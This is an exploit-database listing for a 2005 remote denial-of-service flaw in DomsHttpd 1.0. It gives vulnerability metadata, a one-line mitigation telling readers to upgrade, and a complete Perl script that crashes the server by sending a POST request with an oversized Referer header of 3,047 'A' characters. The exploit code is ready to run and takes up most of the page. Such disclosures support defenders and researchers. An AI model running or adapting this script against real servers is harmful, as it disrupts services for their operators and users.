header-logo
Suggest Exploit
vendor:
DomsHttpd
by:
Jean Pascal Pereira
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: DomsHttpd
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:doms_software:doms_httpd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2005

DomsHttpd 1.0 <= Remote Denial Of Service Exploit

This exploit sends a POST request with a large amount of data to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of DomsHttpd.
Source

Exploit-DB raw data:

#!/usr/bin/perl

# DomsHttpd 1.0 <= Remote Denial Of Service Exploit

# Credit: Jean Pascal Pereira <pereira@secbiz.de>

# Usage: domshttpd.pl [host] [port]

use strict;
use warnings;
use IO::Socket;

my $host = shift || "localhost";
my $port = shift || 88;

my $sock = IO::Socket::INET->new( Proto => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => $port
);


my $junk = "A"x3047;

print $sock "POST / HTTP/1.1\r\nHost: ".$host."\r\nConnection: close\r\nUser-Agent: Mozilla\r\nReferer: http://".$host."/".$junk."\r\n\r\n";

sleep 4;

close($sock);

Navigation

Suggest Exploit

Services By CQR